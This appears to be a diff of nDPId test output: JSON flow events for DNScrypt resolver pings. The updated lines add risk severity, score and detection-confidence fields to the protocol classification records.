-00726{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37123,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305187,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59476,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00739{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55979,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt.AmazonAWS","breed":"Acceptable","category":"Network"}}
-00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312181,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":45987,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305348,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":40009,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304804,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":38136,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305349,"flow_last_seen":946739305457,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312178,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":41913,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00727{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304396,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44491,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311306,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":43528,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00670{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311312,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":55822,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312179,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":46063,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312180,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":37890,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312106,"flow_last_seen":946739312136,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":60735,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00670{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311313,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":51770,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305189,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":47341,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":56688,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306434,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":59489,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00727{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304393,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":56997,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38362,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304394,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44712,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00670{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304369,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55123,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":32970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00726{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304626,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":56035,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":33071,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304396,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59261,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00726{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305191,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":43633,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306433,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":49512,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304367,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":59405,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00741{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312103,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":46313,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt.AmazonAWS","breed":"Acceptable","category":"Network"}}
-00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305350,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":42570,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305214,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":34885,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00835{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":37595,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00696{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312183,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":40451,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":36668,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305329,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":43505,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305348,"flow_last_seen":946739305453,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00696{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304362,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":35005,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312130,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":38812,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
